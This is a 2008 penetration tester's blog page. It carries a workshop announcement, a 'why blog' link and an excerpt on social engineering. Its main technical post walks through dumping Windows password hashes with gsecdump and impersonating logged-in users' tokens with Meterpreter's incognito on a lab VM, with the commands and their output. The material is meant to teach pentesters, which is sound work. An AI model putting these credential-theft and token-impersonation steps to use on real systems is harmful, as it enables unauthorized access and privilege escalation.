Tuesday, September 30, 2008

Why Blog?

Richard Bejtlich has a really good blog post on his blog entitled "why blog".

He lists five things:

  1. Blogging organizes thoughts.

  2. Blogging captures and shares thoughts.

  3. Blogging facilitates public self-expression.

  4. Blogging establishes communities.

  5. Blogging can contribute original knowledge faster than any other medium.
I'll let you read the blog for the discussion on the five things but I've really enjoyed blogging.

I mostly keep the blog as my note taking canvas (for notes I want to share with others) but RB's five reasons are reasons I blog as well.

Sunday, September 14, 2008

Toorcon X Workshop

As I mentioned before, Joe and I are doing a Crash Course In Pentesting 2 day workshop at ToorconX

http://sandiego.toorcon.org/content/section/4/8/

Here's a piece from the description:

"This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection."

But I wanted to give a few more details.

Day 1 is network level pentesting and Day 2 is web application pentesting.

Network level is mostly my responsibility and I'll be focusing on black box information gathering, client side attacks, and post exploitation. Its hard to cover pentesting in a day, so I'll be talking heavily on client side attacks and how to implement those into your pentests and some of the tools you'll need to do it. A little bit on local/priv escalation attacks that you'll need to do once you have that userland shell and post exploitation. There is also a block on metasploit and the students will take home a copy of LSO's Metasploit Mini Course.

Web application is Joe's responsibility and it should be really good. We've had a custom web app built with vulnerabilities intentionally built in. So the students will be able run the tools he is going to discuss and then exploit the vulnerabilities they find. They also get to take the VM home with them.

If you have questions feel free to post up or email me with them.

Friday, September 12, 2008

passing the hash with gsecdump and msvctl (yes more)

So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop.

For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).

"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."

OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.

example:
#popped a system shell and got a command shell with meterpreter

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

#logged into the box as nobody

C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.

Let's see the same scenario with incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#login as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

#log out as nobody
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody

meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.

Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml

http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx

Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.

http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:

"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."

I don't know, going from a local admin on a box to domain admin is pretty interesting to me...

Mike Murray on Human Exploitation 101

http://www.ethicalhacker.net/content/view/209/1/

From the article:

"This is going to be all about dealing face-to-face (or voice-to-voice or text-to-text) with real live people and exploiting the natural tendency to trust.

Of course, this skill underpins everything else that we do when on a social-engineering engagement - in order to impersonate a UPS guy, talk someone out of their password, write a great targeted phishing email, or know exactly where to drop the USB keys - you have to have great skills at exploiting the natural tendencies of humans.

This means a deep understanding of the three fundamental skills (that I have mentioned often in introductory talks and articles on this topic) - the ability to communicate, the ability to be aware of your surroundings, and your ability to control the context (or "cognitive frame") of your interaction."


Human 0days are promised in the future!